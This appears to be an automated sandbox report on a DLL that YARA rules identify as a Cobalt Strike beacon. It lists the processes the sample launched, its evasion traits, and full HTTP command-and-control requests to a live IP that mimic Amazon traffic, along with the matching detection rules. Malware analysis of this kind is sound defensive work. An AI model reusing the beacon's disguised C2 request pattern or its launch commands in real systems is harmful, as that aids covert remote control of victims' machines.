Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009578FB _memset,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,FindCloseChangeNotification,

0_2_009578FB

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\8082-x86.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x86.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllGetClassObject
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllMain
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x86.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllGetClassObject	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01

Source: classification engine

Classification label: mal100.troj.winDLL@14/0@0/1

Source: 8082-x86.dll

Static PE information: Image base 0x6bac0000 > 0x60000000

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE71FA push ss; ret	0_3_00CE720F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE13E7 push FFFFFFC0h; ret	0_3_00CE13F3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CEB4DA push esi; ret	0_3_00CEB4DD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CEB59F push esi; retf	0_3_00CEB59E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CEB59F push esi; iretd	0_3_00CEB5FE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CEB556 push esi; retf	0_3_00CEB59E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0527 push FFFFFF99h; ret	0_3_00CE0533
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE06D9 push eax; ret	0_3_00CE06E6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE166C pushfd ; ret	0_3_00CE1672
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE4668 push edi; ret	0_3_00CE4677
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0634 push eax; ret	0_3_00CE063D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE07CD push ecx; ret	0_3_00CE07D4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE07C4 push ecx; ret	0_3_00CE07CB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE17DE push edx; ret	0_3_00CE17EF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE078D push ecx; ret	0_3_00CE0797
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE179A pushfd ; ret	0_3_00CE17B3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE07BB push ecx; ret	0_3_00CE07C2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0756 push ecx; ret	0_3_00CE0764
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0766 push ecx; ret	0_3_00CE0770
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0774 push ecx; ret	0_3_00CE077F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE68E7 push esp; ret	0_3_00CE68EF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE18A6 push FFFFFFC2h; ret	0_3_00CE1891
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE1867 push FFFFFFC2h; ret	0_3_00CE1891
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE087E push edx; ret	0_3_00CE0887
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0834 push edx; ret	0_3_00CE0853
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0972 push ebx; ret	0_3_00CE0978
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0917 push edx; ret	0_3_00CE091D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE9ADA push FFFFFFC3h; ret	0_3_00CE9AF9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE1A91 pushad ; iretd	0_3_00CE1A93
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE1A7D pushad ; retf	0_3_00CE1A86
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE4B84 push ebx; ret	0_3_00CE4B85

Registers a DLL

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x86.dll

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49689

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Found evasive API chain checking for process token information

Source: C:\Windows\System32\loaddll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 31329	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 34974	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 31989	Jump to behavior

Contains functionality to read the PEB

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE9004 mov eax, dword ptr fs:[00000030h]		0_3_00CE9004
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE8374 mov eax, dword ptr fs:[00000030h]		0_3_00CE8374

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009558DD GetUserNameA,_strrchr,__snprintf,

0_2_009558DD

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR
Source: Yara match	File source: 8082-x86.dll, type: SAMPLE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
20.104.209.69	unknown	United States		8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://20.104.209.69:8082/broadcast	true	Avira URL Cloud: safe	unknown
20.104.209.69	true	Avira URL Cloud: safe	unknown
http://20.104.209.69:8082/1/events/com.amazon.csm.csa.prod	true	Avira URL Cloud: safe	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 8082-x86.dll

Avira: detected

Multi AV Scanner detection for submitted file

Source: 8082-x86.dll	ReversingLabs: Detection: 87%
Source: 8082-x86.dll	Virustotal: Detection: 70%			Perma Link

Machine Learning detection for sample

Source: 8082-x86.dll

Joe Sandbox ML: detected

Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp

Uses 32bit PE files

Source: 8082-x86.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 20.104.209.69

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49689

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /1/events/com.amazon.csm.csa.prod HTTP/1.1Accept: /Origin: https://www.amazon.comx-amz-rid: MTI4NDQwODUyNAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Content-Length: 14246Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49685 -> 20.104.209.69:8082

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS

Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69

String found in binary or memory: https://d22u79neyj432a.cloudfront.net/bfc50dfa-8e10-44b5-ae59-ac26bfc71489/54857e6d-c060-4b3c-914a-8

Source: unknown

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00951449 _memset,__snprintf,__snprintf,__snprintf,HttpOpenRequestA,InternetQueryDataAvailable,InternetReadFile,InternetCloseHandle,

0_2_00951449

Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: FireEye
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown

Uses 32bit PE files

Source: 8082-x86.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Yara signature match

Source: 8082-x86.dll, type: SAMPLE	Matched rule: CobaltStrike_Resources_Artifact32_v3_14_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/artifact32{.dll,.exe,big.exe,big.dll,bigsvc.exe} signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x and resources/artifact32uac.dll for v3.14 and v4.0, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 888bae8d89c03c1d529b04f9e4a051140ce3d7b39bc9ea021ad9fc7c9f467719
Source: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Sleeve_Beacon_Dll_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s sleeve/beacon.dll Versions 4.3 and 4.4, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, rs2 = 78a6fbefa677eeee29d1af4a294ee57319221b329a2fe254442f5708858b37dc, hash = 51490c01c72c821f476727c26fbbc85bdbc41464f95b28cdc577e5701790845f
Source: 00000000.00000003.435119690.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000003.435119690.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.436145653.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000003.436145653.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.435087941.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000003.435087941.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.581071660.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
